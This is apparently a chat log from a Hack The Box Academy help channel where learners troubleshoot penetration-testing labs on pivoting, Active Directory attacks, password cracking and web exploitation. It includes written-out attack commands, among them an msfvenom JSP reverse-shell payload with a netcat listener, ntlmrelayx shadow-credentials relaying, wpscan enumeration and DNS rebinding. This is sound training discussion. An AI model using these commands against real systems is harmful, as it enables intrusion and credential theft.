#modules
@rustic sage dont share discovered passwords
Sorry mate
his user, search through the additional shares they have access to and identify the password of a domain administrator. What is it?
It helps if you include the module and section name
Password Attacks
Credential Hunting in Network Shares
I tried all of the passwords I found, none of them worked
The correct password is in that .txt file, I...###
thanks bro !
If using the pw in the command line, use single quotes to wrap the pw
executed everything correctly but still have not been able to retrieve the flag.txt. I examined the commands as well since sudo is not a part of it but the file is owned by root
Helps to know the module and section
Password Attack- Webservices
Also make sure that you are in a directory you can write to (most common mistake)
Web services? Do you mean "network services"?
Can you link it?
Sorry my apologies -- Login Brute Force - Web services
Yes! lol my apologies, I have been using medusa thats why the password attack got stuck in my head
Yeah, then my suggestion is to make sure to move to a directory you can write to
/tmp is always a good option
I was thinking of mentioning that earlier but I could not use it either under /tmp
but ftpuser should be able to get the flag
when you mean re-writing do you mean using chmod o+r?
No
I never mentioned rewriting
exactly my struggle, going to try and reset the pwnbox to see if that works but tried for a couple of days
writing*
It has nothing to do with chmod
Also o+r would be read permissions
The broad assumption im making is that you logged into the ftp service using ftpuser, and not sshuser
sure :)
sudo wpscan -e p --url https://cube-case.htb --disable-tls-checks --no-banner --plugins-detection aggressive -t 100
I logged into the sshuser server first and then from the inside I logged in to the ftp service. Is this not the same of what you are saying?
Are you logging into the ftp service with the user ftpuser and the pw you discovered?
Hi, i tried this but it doesn't work, can u still help me?
can i send here a screenshot?
I was able to get it just fine with a -sUV scan not sure what else to really tell ya to help
look at this
Needs passive detection instead of aggressive
I am logged in under ssh using sshuser; then inside ssh I used ftp ftp://ftpuser<PASS>@localhost
ftpuser:pass@localhost
what do you mean?
You dont need both
Theres a reason my first s was lowercase
is not the same than -sUV?
Its not
oh, whats the difference?
What you did was -sSUV
This is the one correct I wrote the <> intentionally in the chat
so -sUV = ?
-sUV is -sU and -sV
and is not the same if i separate them?
-s[can]U[DP]V[ersion]
You threw in an additional scantype
You added -sS into the mix
You added another set of scans on top of UDP
And because there is a detection mechanism in place, it could incidentally trip it
so the only types of scans i need are -sU and -sV?
Don't use the user:pass to log in just user@localhost. Then put the pw in
Correct
If the detection trips, it blocks you for 3 minutes
different command, same output. Have i get blocked maybe?
Try:
- reconnecting to the vpn
- resetting the lab
- sacrificing your firstborn
Thanks!! I can't believe it was that minor autologin when putting the password instead of manually doing it. Why does this happen if you don't mind me asking?
No fuckin clue
Configuring the hosts file must have fixed the entire issue, my bad for using the wrong command :(( i tried many different options with the IP address before to see if it will output the vulnerable plugin and just reused the latest one in my bash history xD
Thanks for the help, much appreciated <3
Btw @devout lily for all the skill labs, theres a status.php page you can visit at http://ip/status.php
So you can check if you were blocked
I'll let u know, i have set up the connection again
Thank you for the help!
I think I understand now. Thank you!
I have two more questions. Wouldn't it be better to exclude the bad characters from the beginning, like 0x0D, 0x0A, 0x00, or should we still enumerate in case we find new bad characters?
And what are some clear signs that a bad character has messed up a byte array, like you described?
I added the -v option
That's just nmap showing you the hex bytes of the response given
Also deleted bc the flag is in the image
sorry, i didn't know
Gotta look closely at output sometimes (it was right there in HTB{FLAGHERE})
i have seen it now, really hard to see hahah
i think that i wont use the -v option no more haha
-v is only really useful for debugging
Hello guys! I was reviewing and re-doing modules after a solid break and came across an issue with Module: Footprinting / SMB. Nmap scans from my own machine give the wrong version of the samba, without the exact subversion. Root cause of that - some changes that have been made inside kali nmap. Netcat also doesn't provide the right banner with nc -nv ip port.
What do you think, can it make problems inside CPTS for example, should I reinstall an older nmap? Subversions often are crucial, and I can't find this exact correct banner from my own kali on this module in any way. Even from the wireshark capture. Although it gives the right answer with the academy pwnbox nmap scan.
Well since this isnt related to an academy module i suggest linking your htb account and looking for other channels to ask in.
NexusSeven is an active challenge and you should not post spoilers about the challenge like that...
Delete that message and go to #challenges and ask for a hint there without posting spoilers of active content.
Hey guys, I'm working on Pass The Certificate (module 147, section 1335) and am stuck trying to get flag.txt on Administrator's desktop. I was able to obtain jpinkman's ccache file and evil-winrm into DC01, but having trouble moving laterally to the Administrator. Do I need to use the AD CS NTLM Relay Attack for this? If so, I'm struggling to get gettgtpkinit.py to work on the certificate obtained from the previous steps.
Yes you need to perform the relay attack and it should result in obtaining a different file.
I'd search this channel for clock skew as this gets asked quite often and there are already plenty of suggestions to fixing that error.
Awesome, thanks so much for the help!
If you cannot get it to work still, you can send me a DM. I'm going to delete your post with the command, as that is considered spoiling content above Tier 0.
Will do
Did anyone manage to solve question 1 of this section??? No matter what I try I can't get the correct answer. I am starting to wonder if there might be a mistake in the module. Also, I can't look at the step by step because I'm not a subscriber.
I already looked through the posts on #1234357888114364508 but couldn't find anything related to that
Hello! I'm working on module "SQLMap Essentials", section "Attack Tuning", first question (What's the contents of table flag5? (Case #5)). I got the flag in standard format HTB{<string>} but when I submit the answer there is an error: Incorrect answer! Can you help me? What am I missing?
I suggest running it again, as sometimes it might miss a character or something from the flag or cut off parts. At least I remember that happening when I did that module.
Hey guys, I need to contact htb support team about payments. Where can I do that?
Would use the cube located at the bottom right of Academy dashboard.
Thank u I have send them an email
Thanks, I try again!
hello just a question about the login brute force module in the custom wordlist
what the hell iam supposed to generate with
like there is no name no hints no nothing
If it continues, you can DM.
Follow the steps outlined in the section, which includes the information they used in the examples.
Use the example information
oh i jumped to the question cus i know how to do it anyway
thats a bit stupid ngl
ty all
In many cases the reading can reveal new or different ways of doing things as well. So I wouldn't always jump straight to the questions
In short though: when in doubt, check the reading first
100%
but like i use my own linux distro which doesn't have apt on it so sometimes they ask to install software, i have alternatives too but mine won't work as theirs cus you know password custom list tools are different
apt package manager
iam going to use the pwn box for that now
Is there a mod or any support person that could check this?
also check theres not an extra space in the end 🙂
why is crackmapexec smb used for kerberos bruteforcing? arent those 2 totally different protocols and things
smb is a protocol, kerberos is an authentication method not a protocol
well, it's an authentication method protocol i guess. but they are different things.
kerberos uses tickets to grant access to specific resources, smb is a service that can use a kerberos ticket, or a username and password
do you know if this covered in the intro to ad module?
it seems that i am very lost on this, i might have to take the intro to ad mod
What do you mean?
i was just confused why nxc and cme was using smb in their parameters when trying to do kerberos usename\password cracking
Where is it doing this?
no because its HTB giving me the creds 😄
Yeah I am in the habit of just running creds with netexec regardless, but if it doesn't explicitly say, RDP or SSH it usually means something else. I did that one with linux tools.
good point it does say just authenticate not ssh or rdp so you are right
Running again helped, there were wrong symbols, and in the second try there were wrong symbols but different. I cheated and assembled the correct answer 😆 I think it's because of my bad network connection
Yes exactly-- when approaching a buffer overflow problem, it can save time to exclude some of those characters from the beginning. "Bad" characters aren't universally bad in all scenarios, but those three very often are. There's always the possibility we'll need to enumerate additional characters that happen to be "bad" given the particular app, architecture and delivery method we're working with in a given scenario.
The byte array comparison is a sure-fire way to tell if and why a buffer overflow will fail due to bad characters. If we were to skip this check and accidentally send a bad character, then only part of the payload will be written to memory. This leads to unpredictable program behavior. At best our payload will quietly fail... or we may receive a more "clear sign" when the application crashes.
It's a good idea to thoroughly enumerate bad characters before firing away at the target. If we crash the real target application, there's no guarantee the OS will restart it. In a lab, this just costs time restarting the box. In a real engagement, we might only have one shot to get it right.
I have a question whether I'm on the right track solving Parameter Logic Bugs - PoC and Patching - Unexpected Input . Appreciate some help
Ah, I see. I understand now, thanks a lot for explaining!
doing the pass-the-certificate section of the password attacks module rn
does anyone know how to fix this?
Configuration impacket version: 0.11.0 Python version: 3.11.8 Target OS: Kali Linux Debug Output With Command String ntlmrelayx.py -t ldaps://domain.com --shadow-credentials -smb2support --no-dump ...
Password Attack module
suggests using kerbrute or netexec smb to find possible usernames and passwords from the ad
which is basically kerberos bruteforcing
Can't get a reverse shell back to my machine .. i have entered the correct ip and am using the port to connect back from the nc listener. Error shows failed to daemonise connection timed out (110).
Also the script is getting executed but the connection is not coming back to the listener please help im stuck since forever.
Ps this is from htb academy for file upload attacks module
Keyword is OR but that does not mean both are using the same means of authentication to get results.
When using username/password with netexec you are using NTLM.
yeah just ask here. make sure not to spoil content from modules above tier 0 though.
answer format is: word-word
I tried it not working
DM me
So, this is for Module 19 Section 101
Host Discovery
I'm supposed to use the workstation, right?
I'm trying to figure out what command to give to the powershell...
You should only have to review the information in the last example code block that is in the section. Use that information to answer the question.
Uhh...I got the hash from the DC pfx file...it's empty.......
I don't know why, but it is...
nvm, I just logged in with the NTLM hash
Keep going
on the struggle bus with Indirect Prompt Injection 5. Hoping a break to make dinner resolves the issue and new ideas come to mind 🙂
You still have the port in the second screenshot
deleted
The flag I got is wrong too, probably for a different section
I sprayed all 26k combinations from the provided credentials, only got that 1 user that didnt work. I used a different protocol to get in and found the user it wanted that way. I just have to find the other flag now
yeah looks like everything I found was for the next session lol
How can I hide the images??
Ok so
The DC01 computer account has the DCSync right. I was able to get the TGT of the DC01 computer account, but when I try to dump the NTDS.dit, it doesn’t work. However, when I tried with the Administrator TGT, it worked
@lime cosmos Please refrain from posting content from modules above tier 0
Thanks @cloud urchin sorry about the confusion
Ok
Any suggestion about the module cracking the PIN ? I'm using the PIN solver script, the burp Intruder and also with ffuf, but I'm always receiving http code 401
Hey can I have some help with the payloads and shells module please?? I download the msfvenom file on my RDP client, I upload it to the website and deploy it. I have my netcat listener running on the correct port on my pwnbox and I go to the subdomain im supposed to go to for the shell and nothing happens. (msfvenom command: msfvenom -p java/jsp_shell_reverse_tcp LHOST=172.16.1.5 LPORT=9001 -f war -o managerUpdated.war) (netcat listener: nc -nvlp 9001)
That looks like the wrong LHOST without looking at the module right away. Pwnbox generally doesn't have a 172.x.x.x IP. Is that the subnet of one of the NICs?
ive tried using both the pwnbox LHOST and the host1 ip (from RDP client) and neither of them seem to connect or do anything
in the pwnbox type ip a
use the 10., i think ens192
unless you're trying to make the victim machine connect to the target you spawned, then it'll be different unless you're pivoting
I think im using the right ip for the pwnbox? tun0? 10.10..??
then try that as your lhost
yeah I just did then I reuploaded the file to the website and went back to the subdomain and still nothing
welp best to state the exact section and question you're on
other than that, maybe the wrong target type (jsp) idk
make sure to use the correct host/port for your attacker machine or the pivot, whichever one
Shells & Payloads, The live engagement, question 2
to make sure im understanding correctly Id use the msfvenom command on the RDP client and then upload the file I made from that to the website? and in the walkthrough it said to use (ip a | grep "172.16.1.*") and it spit out the ip (inet 172.16.1.5/23 brd 172.16.1.255 scope global ens224) which is what I used for the LHOST and then port 9001 which is the same as the netcat listener
i'm not sure, i don't recall the skill assessment specifically. if you can execute the binary you generated with msfvenom successfully, then it can only be either 1) a network connection/routing issue or 2) incorrect settings with your msfvenom command.
oh okay, well thanks for helping!!
Attacking Common Applications Attacking Drupal
My php rev shell won't work in my nc listener after pressing save in the web page that takes it.
Excuse me.
Silver subscription
Description
What you get
- Direct access to all modules up to (including) Tier II
- Direct access to the entire Bug Bounty Hunter job role path
- Direct access to the entire Penetration Tester job role path
- Direct access to the entire SOC Analyst job role path
- Direct access to the entire AI Red Teamer job role path
- Direct access to the entire Junior Cybersecurity Analyst
—-
So if I subscribe can I finish two or three paths, without the cube system
You can complete a full pathway without using any cubes, you earn cubes and you can use them to unlock other modules outside of the pathway
I have free time and no life and I want to complete two or three, can I
Or just stick to one path by subscription
I think the silver subscription is just one pathway?
Yes thats my question , one path to complete or more than one path
sysreptor is stupid how do i reset my password?
I literally saved the password bro letter for letter and now it's invalid??
I thought you'd have access to all the paths you posted. You will only get an exam voucher for HTB CJCA and either HTB CBBH or HTB CPTS or HTB CDSA though
That might be it too I’m not entirely sure
Is the academy more worth it or regular HTB more worth it?
Probably depends on where you're at with knowledge
i like to think academy is the learning platform while the labs are where you practice what you know.
But is the labs worth paying for?
.
@long kestrel Please don't reveal answers
cool thanks
worked when I repeated steps on pwnbox instead of my VM. thats always a fun one
if it's the lab i think it is, i just think the lab doesn't spin up properly all the time. which is a pain
Anyone available to help on Advanced SQL Injections Skills Assessment Q1?
I'm able to query the columns in the current table. Pretty much all the columns that appear in the source code, however, the password column is not giving me anything and I'm not sure on why. Any nudge would be greatly appreciated.
Edit: Found the issue, seems there is a filter. Gotta read and dissect the source code carefully!
Thanks @river grove
yeah I just tried again with the pwnbox to test it and the FTP service didn't spin up again even after waiting a few minutes
Module: Shells and payloads.
Task: The live engagement
Is the initial foothold experiencing network issues "by-design" ?. I'm having troubles to maintain an proper session...
All ideas are welcome 🙂
try changing to tcp vpn, it's not laggy "by design"
hmm, okay I'll try this.. It is weird cause it is even getting disconnected with the pwnbox.. 🙂 - But ill have a look 🙂. But it is what it is eventually. i
if you're doing a/b testing with the pwnbox, disconnect from the vpn on your machine ¯_(ツ)_/¯
I'm having only 1 connection at a time. Was trying first with the pwnbox and then tried with my own machine but the situation was present on both. The issue is present between the pwnbox/myhost and the initial foothold machine. Both ssh/rdp
his user, search through the additional shares they have access to and identify the password of a domain administrator. What is it?
Password Attacks
Credential Hunting in Network Shares
I tried all of the passwords I found, none of them worked
hi, after setting the vHosts for session security modules, i am not able to access the websites. Ping is working for the ip and after setting the /etc/host i am also able to ping the domain names. But curl or request from browser is failing. Tried restarting the lab multiple times and tried changing my VPN locations. no luck
i don't know if its okay to attach screen shots for reference here
Do HTB academy boxes boot always from a prepared image, or do they keep something from previous boots / players? I ask because I have seen different hosts in the "network" tab of explorer in different lab runs ...
Although this may also mean that I just see boxes of other players that are just discoverable?
Yes it is assumed that you have completed the CPTS pathway
Now You can get 1 month sub and do Tracks that are related to your exam or certification.
This is where it is related
Academy for focused learning and then HTB labs to make those concepts stronger.
Hey guys anyone had issues with exploiting the attacking common applications attacking drupal think the vms are bugged i have done this again and again followed instructions to exploit it the machine ends up freezing 10min in and thats it no exploit cant do anything
Moment start trying to change settings and add content page starts freezing
Been 48hours now of dealing with it im from aus so the vpns bit slow as well but frustrating anyone else had issues?
Yeah vm no good anyone doing dont bother using metasploit just upload php code navigate using curl
I have been stuck on this question in Parameter Fuzzing GET. Using what you learned in this section, run a parameter fuzzing scan on this page. What is the parameter accepted by this webpage? does anyone know how to solve this
@severe eagle okay thank you
Hello, I'm trying to complete the module "Linux Fundamentals" and I'm trying to conclude this question: What is the name of the config file that has been created after 2020-03-03 and is smaller than 28k but larger than 25k? (section: Find Files and Directories)
I run the following command:
||find / -type f -name "*.conf" -newermt 2020-03-03 -size +25k -size -28k 2>/dev/null||
But it's telling me that it's wrong... I read some writeup to check if I was good and yes, why is it telling me it's an incorrect answer?
Mb I'm just stupid :>.
I need help in choosing a new module, I have already completed 1. Windows Fundamentals 2. Introduction to networking 3. Introduction to active directory.... Where should I go from here? Priv esc OR Windows Attack & Defense?
Is it after the full path or just the filename?
Hello,
I am on Windows Privilege Escalation Module, I am working on Windows Privilege Escalation Skill Assessment Part - 1. I am stuck on question 2 and 3.
I am on Windows Server 2016, I need to find ldapadmin password and tried everything taught in the module, still did not find anything. The SeImpersonatePrivilege and SeAssignPrimaryTokenPrivilege is enabled, however, Juicy potato and printspoofer exploit fails.
Any nudge
Why the -sV option is not showing to me the version of that service?
Firewall and IDS/IPS Evasion - Hard Lab
Hi everyone,
In the Pentest in a Nutshell module -> Linux Privilege Escalation section https://academy.hackthebox.com/module/296/section/3398
it says that the user john is able to run /usr/bin/nano without typing a password, but it still requires a password when i try out the procedure myself...
I think the issue is with the ordering in the sudoers file.
https://unix.stackexchange.com/questions/67435/sudo-password-prompted-even-when-nopasswd-is-set
Hey, I’m doing the password attacks module, I’m on the intro to jtr. Is it possible to use the vpn in this part of the module, cause I don’t wanna use the pwnbox but there is no ssh to access the passwd to crack r0lfs password
You never are forced to use the pwnbox. You can always use your own VM. Sometimes there are sections of modules that require you to run commands from the target spawned though (not the pwnbox.)
But how would I get the specific passwd file into a vm
And there is no target spawned in this
copy/paste the hash?
Ohhh, ok, thanks
How are you trying to execute juicy potato? Reread the hint
I've never liked the order of questions in that module. Do question 3 then question 2
Ok
I didn't read the hint in the first place.
Hi i am in the end of AEN did most of it blind but got to a point where the exploit dont work in lateral movement section (ftpservice) if anyone could help i would appreciate
Why not search the solution for your question? I mean, it’s a walkthrough
I tried the solution in the path but didnt work
Even restarted the machine and tried another online solution to the exploit
ok i will see what i can do
If SeImpersonatePrivilege is enabled, still having trouble exploiting it. Could you explain why?
Lateral Movement Module -> Skill assessment -> Second question says there is a flag on a desktop, but there is not. Can someone pls check? Seems like a bug to me
Hi, anyone could help me with Windows Attacks & Defense > PKI - ESC1? I did convert to cert.pfx but when running Rubeus it shows this error "KDC_ERR_PADATA_TYPE_NOSUPP".
cpts path?
i also did get the same error but dont know to solve
I am doing the module solo, no path
its tier 3?
It was there when I did it a couple months ago. Make sure you're looking on the right desktop.
It can be a lot of things but assuming everything with your exploit execution is correct, the biggest issue is generally how and where you are executing from. Hence the hint.
I just noticed, I guess the question is a bit misleading! 😄
This usually means theres an issue with the ADCS. I ran into the same error. My solution was to restart the machine
Also, make sure you set your realms properly in the krb5.conf
Previously, I have exploited it a couple of times, and it worked all of the time, don't know why it is not working.
Hi
I tried this in both the pwnbox and my Kali VM machine
I mean if I'm understanding this correctly, this should start a local listener on local port 3300 request Meterpreter to forward all the packets received on this port via our Meterpreter session to the remote host 172.16.5.19 and remote port 3389
@snow mirage Please take care not to post contents from modules above tier 0
So where can I go for help on this module that's a part of the CPTS path @cloud urchin ?
here, just don't post content from modules above tier 0
...
That was from the module. bro what? I'm not understanding you. So I can ask for help for the module here....but I can't post of the module here because it's above tier 0?
Or was it because of the screenshots? @cloud urchin
Your screenshot contained contents from the module. It had a username and password. On top of this, anyone who has done the modules doesn't need details from the module because they know what to do already so there is no need to post content from the module.
Your error said failed to connect to the localhost, so it's likely a routing/config issue with your proxychains.
My proxychains has the line socks4 127.0.0.1 9050 since I'm using a version 4a socks proxy
My meterpreter socks proxy server was set with ip of 0.0.0.0 and port of 9050
so my socks proxy server matches my proxychains
but it's still not working
You can state the module and the issue without the screenshot. If it's in the CPTS path I can boot up the lab and take a look
you may also need to wrap the password in single quotes due to special chars
but the error is clear, says can't connect to localhost
maybe go over the section again, looking at my notes i'm not seeing connecting to localhost
should be connecting to the target
Module: **Pivoting, Tunneling, and Port Forwarding**
Section: Meterpreter Tunneling & Port Forwarding
Yeah I was just trying to follow the instructions in the module.
There's a line about creating a Local TCP relay and then connecting to the target through that localhost
over xfreerdp
i see, that's further down than i was looking
the output crack_file is empty
Didn't mean to spoil content my b
but this part doesn't look like you use proxychains
so you are doing things the section didn't show, try following exactly what it shows
ive extracted base64 string from mimikatz, removed new lines, and saved it to file.kirbi, then i run python3 kirbi2john.py file.kirbi, and i get a crack_file, but its empty
im on AD assesment 1 btw
I mean using proxychains and setting it up was a part of the earlier portion of the module. That being said when I say I "set it up" It already had that line socks4 127.0.0.1 9050
There was a line right after that to use the socks_proxy module to route all the traffic via our Meterpreter session which seems to copy the proxychains conf I think?
So once that's done, I route all the traffic via my Meterpreter session with autoroute
and then followed the instructions to portforward in the next topic section of that page
So it sounds like you are in-fact supposed to do it. I think the meterpreter session is doing the equivalent of local SSH port forwarding. It's just not working lol
I'm on Question#5 in the Network Foundations/Internet Architecture quiz, and its asking me In which architecture is the control plane separated from the data plane? (Format: two words, one of which is hyphenated) I've answered "Software-Defined", or software-defined, and it's not accepting any of my answers. Is this the incorrect answer? https://academy.hackthebox.com/module/289/section/3242
@mental canopy is it possible I can DM you. if not, totally ok.
Yeah for sure, DM. I just got the targets up so I'm working through it now
try setting a port other than 9050 in proxychains.conf and in metasploit socks_proxy
I'm on Question#5 in the Network Foundations/Internet Architecture quiz, and its asking me In which architecture is the control plane separated from the data plane? (Format: two words, one of which is hyphenated) I've answered "Software-Defined", or software-defined, and it's not accepting any of my answers. Is this the incorrect answer? https://academy.hackthebox.com/module/289/section/3242
Maybe this is not the right channel (GOt redirected here, so just copy pasting my question over here)
Why is the vpn configuration file working perfectly fine but not if i run it as a basic command (exiting due to fatal error)
1 line before: 2025-08-30 20:51:40 ERROR: Cannot ioctl TUNSETIFF tun: Operation not permitted (errno=1)
(It is a Linux-specific ioctl (input/output control) command used by user-space applications to request the creation of a network device that operates at the IP (Layer 3) level, known as a TUN interface.)
Still not quite getting it- so this is like a network device in the network layer (3) that is being "newly" created in order to add a vpn configuration ? (Thats my assumption kinda)
https://labs.sysre.pt/login/local/
for hosted version on the login Page… There’s a password reset
And for Self-hosted:
when was your last login?
Inactive accounts get deleted after some time.
If not, you just got the wrong password
in DACL Attacks II, the Shadow Credentials section states that if Certificate Trust model is implemented, the client issues a certificate request to obtain a trusted certificate from the environment’s certificate issuing authority for the TPM-generated key pair. On the other hand, if the Key Trust model is implemented, the public key is stored in a new Key Credential object in the msDS-KeyCredentialLink attribute of the account.
But in the exploitation attempt, whisker or pywhisker generate a certificate that is later used to obtain a TGT, even tho whisker obviously shows that it is editing the msDS-KeyCredentialLink attribute which means the Key Trust model is used instead of the Certificate Trust model.
Can anyone clarify this point ?
I don’t get it, can you explain it please?
I’m working on the lab “Windows Event Logs & Finding Evil: Analyzing Evil With Sysmon & Event Logs” using PWNBOX. sysmon.exe -c filename.xml wasn’t working, so I tried troubleshooting by uninstalling Sysmon and then reinstalling it using sysmon.exe -i -accepteula -h md5,sha256,imphash -l -n. Even after this, I still cannot get sysmon.exe -c filename.xml to work. I also changed the directory to C:\Tools\Sysmon, but it keeps giving an error that the directory or file doesn’t exist. I need this to properly attempt the hijack using calc.exe as part of the lab. Could you provide guidance on the correct way to use the configuration file or troubleshoot this issue?
Hi.. am having trouble identifying a network interface which I can use to capture a handshake. I have tried ip a and iwconfig but there is no wlan interface only 2 interface which is tunn, internet and loopback. Running an instance on htb. How do i solve this?
hey guys, i need help with these two questions in Footprinting Module DNS Section
Yo
@prisma knot Please don't post content from modules above tier 0, ie passwords etc. Try wrapping the password in single quotes.
Idk what Tier 0 is i just need some assistance with a command, didn't post anything thats not in the cheat sheets
Cheat sheet is part of the module.. the modules are tier0-tier4
Thanks for the help
In "Pivoting, Tunneling, and Port Forwarding" module section "RDP and SOCKS Tunneling with SocksOverRDP" when i am extracting the "SocksOverRDP x64 Binaries" on the Windows machine from where i am supposed to pivot the window is deleting the DLL file before i can even execute the command how to fix this
Disable real time monitoring
I am the alpha skid
That's great, please stay on topic though.
same thing i can do in CPTS exam ?
@cloud urchin
The only restrictions you have on the exam are 1) not getting help from anyone and 2) following the rules of engagement
Okay
Has anyone completed.
Attacking Common Applications Attacking Drupal
If so, please DM me.
This line saved my day! Thanks!
Hello, can somebody help me, i am in the modern web exploitation techniques PDF page, so i use DNSRebinder for making my petition, i am using like this ||sudo python3 dnsrebinder.py --domain www.attacker.htb --rebind MyServer --ip 1.1.1.1 --counter 1 --tcp --udp|| cause when i use it like it is suggested in the module i get the internal server error, so the only thing i was able to do is to load an HTML PoC but i think that scripts aren't running. Plz give me some hints
Plz help 🙁
i have masked the flag actually
why is HTB flag ans not getting accepted ? is there any issue with the lab ?
as mentioned in the hint i have run --no-cast and -T flag5 parameters
Somebody can help me plz?
for one your server isn't going to be 1.1.1.1
No, the 1.1.1.1 is the only way i found to bypass the internal server error
Casting probably modifying the flag. Guess what it could be based on what the flag says, or re-do it
How can I apply to contribute to making content/modules on HTB ?
This isn't really the channel for such discussions, you'll want to follow the instructions in #welcome to gain access to more channels. But here https://www.hackthebox.com/blog/make-vulnerable-machine
The page is resolving my server, but the script isn't running, i got no requests to my server, and the DNS rebinder only got two requests to render the PDF but not the request of the script itself
I could be misremembering but I thought you had to use your own DNS server for that
Instead of DNS rebinder?
looking at my notes, your command isn't the same as mine so idk
but you are using like it's mentioned in the module ||sudo python3 dnsrebinder.py --domain www.attacker.htb. --rebind 192.168.178.1 --ip $PUBLIC_WEBSERVER_IP --counter 1 --tcp --udp||?
idk, there are like 5 DNS rebinding sections, i just picked one since you didn't say which
i'd suggest just going over the section again carefully and making sure it's setup properly
Im using the SOP bypass one
cause when i go to the flag page it says "Access Violation: Not localhost"
sounds like it's got some protection you need to get around then
i can't quite remember
i remember it worked though
so like i said go through it again double check make sure everything is correct
Ok thanks for ur help mate
yeah sorry been a long time since i did that module
I got it bro thanks for ur suggestions @cloud urchin
@stable flume Please take care not to post content from modules above tier 0
ohh my bad sorry
another one...
in the Windows System Enumeration section, its impossible to find the last two flags of the skills assessment.
It gives you a cmdlet to run if it fails, did you try that?
the one that redirects it to a file? yes
no, the cmdlet your app says
systeminfo ?
no... the cmdlet shown in your screenshot..
Yeah okay, get-computerinfo works, thanks :)). the section never mentioned it, i even checked the step by steps solution.
Shouldnt the system info get outputted by WinPEAS ?
probably yeah
looks like that user doesn't have perms for the binary though
i didn't do that module so not sure
Should hack the box have an exploit development certification? I mean offsec has several
And wouldn’t it help people who want to learn to code for infosec?
You can tell em you want one through /feedback
i found another command on the internet for the last question.
but for the OS version it doesnt accept any of my answers xD
I think they are adding more python content tho
Since the AI red teamer path assumes python fundamentals skills
So I think they probably do have SOMETHING in mind
Where they integrate coding skills
It says it recommends calculus as prereq for AI path
Do you really need calculus?
But it does say python fundamentals is required
I think maybe I should stop talking about all this stuff because it does look like material that requires programming is slowly being added
As 0xW1LD already said. If you miss something, then write a feedback
Ok I just wrote a bunch of feedback.
I wrote some recommended paths in feedback:
- malware development/exploit development path in c/c++
- python web pentesting path
- wireless pentesting in python path
- writing phishing pages that evade phishing filters path with JS, PHP, SQL, etc
Anyone thought of a path I haven’t?
Not necessary to have all these paths of course but it would be cool
In the event that they don’t add all of these paths, I will try to learn some of this stuff anyways at some point
But I’m not gonna do that until I have completed other learning paths preferably at least one from tier 3
But ya I don’t know I don’t think any of those paths need to be a path but I can see someone benefiting from it
Most of them would be skills paths
Probably
But what do you guys think?
I also think it would be cool to have a path that does stuff with BASH or PowerShell as a specialty like for privesc
Any of these things resonate with you guys?
Any of these would be cool imo
Not necessary because you can just learn frameworks and build stuff
Maybe post all your stuff here too @quasi wave
This might just get lost , unless you provide /feedback
But would definitely be fun. Since I don’t want to depend on a learning path becoming a thing, I looked at python frameworks that could complement CWEE material, it gave ok results.
I did a bunch of /feedback stuff
If I remember correctly, malware development was once addressed in a cube cast.
The Python Web Pentesting exists and is called CWEE
There are several wireless pentesting modules. Do you want to write existing frameworks in Python? Or what is the goal here?
Bypassing phishing filters doesn't have much in common with ethical hacking.
Okay 🙂
For each of the things I mentioned I made feedback
I didn’t realize CWEE covers writing your own tools in python
Great. So I am psyched that’s a thing.
Bypassing phishing filters would be an educational thing. Could be good for red teaming or learning how to defend against it better.
The Privilege Escalation path covers bash and powershell tools and writing simple privilege escalation scripts
Also, which cube cast?
Ok point taken
Can I listen to an old cube cast?
I would like to listen
Tools is perhaps a bit over the top, but you write various exploits.
Ok that’s fine it will get you started then
For wireless, I’m thinking there could be a path to write like IoT attacks in Python or write python scripts to complement wifi or other wireless hacking tools
Like to complement existing tools
Why don't you want to use existing tools?
Python is great for automating things, but it's not really suitable for replacing existing tools.
Ok got it
Never mind that then
What about python for enterprise network attacks to complement pro labs?
Maybe I’m overthinking it
You wouldn't really use python for attacking enterprise networks, you're more likely to need a compiled Windows compatible language like C
Ok
Check out Attacking Enterprise Network module
Ya well in that case maybe I’m overthinking it
Ya that’s a module at the end of CPTS
Well ok
Well maybe I am being dumb but I looked at announcements page and I can’t find the exact cube talk even when searching for exploit development.
Was this a recent cube talk?
Or was it a long time ago?
But you can find all Cube Talks here. I don't know in which one this was mentioned. It could have been a while ago.
Regarding malware/exploit development in C/C++... you might be interested in some of the Tier IV Defensive modules. While the exercises and assessments are defense-oriented, the section content is fairly purple. These modules assume a basic understanding of C/C++, pointers and structures, and there are some tricky programming challenges.
Intro to Windows Evasion features some exploit development in C# as well. More of these would be great.
yo guys im on AD assessment 1
idk this might be a spoiler
anybody i can DM for help ?
how did you identify where the problem was?
could i get a nudge for NoSQL injection sa2?, pretty sure i know what to do just need a slight nudge on whether what im doing makes sense
you can DM me
@wanton heath No. This server is for discussion of HTB, not illegal stuff.
Sorry I didn't know it was illegal I'm new to this 😁😁
I am having the exact same issue - hashcat does not work on the provided vm- i have the hashes but they do not crack with rockyou
If hashcat iterated through rockyou successfully it sounds like hashcat is working
Introduction to Networking and Network Foundations modules. Which one should i start first?
I second this
Hello, would appreciate some help. Crafted a golden ticket, converted to .ccache and exported, but I get this error: [-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database) when trying to connect with my newly created user GOD
I found this picture in "Network fundamentals":
IP address started with "503.x.x.x"?? Really? Who is the author of this study, I wonder?
You can post such failures in #1234357888114364508
already solved it.. i was using an instance instead of RDP
Attacking Common Applications Splunk - Discovery & Enumeration
I cannot access any of the splunkd ports attached to the target port using either curl or the browser. How do you resolve this issue?
anybody can help me?
@hasty mauve @brave field
Really late reply but I might have an answer (maybe you already knew but just in case).
I ran into the same sharp/bloodhound issues. Running the pre-installed sharphound.exe and bloodhound legacy on the remote workstation was the only method that led to 13 kerberoastable accounts.
Then I noticed that the krbtgt account was visible in the 13 accounts and not in the 12 accounts. Bloodhound legacy uses a different query which leads to 13 instead of 12:
MATCH (n:User) WHERE n.hasspn=true
RETURN n
vs bloodhound ce query
MATCH (u:User)
WHERE u.hasspn=true
AND u.enabled = true
AND NOT u.objectid ENDS WITH '-502'
AND NOT COALESCE(u.gmsa, false) = true
AND NOT COALESCE(u.msa, false) = true
RETURN u
LIMIT 100
This explains the different outcomes! One thing I still don't understand is why using the latest sharphound version only leads to 1 or 2 kerberoastable users, that still bothers me 😂
Thanks for the info, this makes sense.
I suspected that this is the case since I ran into a similar issue in a different scenario, and the query was the thing that made the difference.
I just never got the chance to test if it's the case or not on that specific lab.
I will attempt to test the latest SharpHound version and see if it will give me the same result as yours.
I am curious, let me know the outcome! For now I would recommend to specifically use SharpHound v1.0.3 (version installed on htb windows workstation), from there on you can just use bloodhound ce in combination with bloodhound legacy queries to get desired results for htb labs
Just ran SharpHound 2.7.1 (which I believe is the latest version).
It got me the 12 users, just like the old one did.
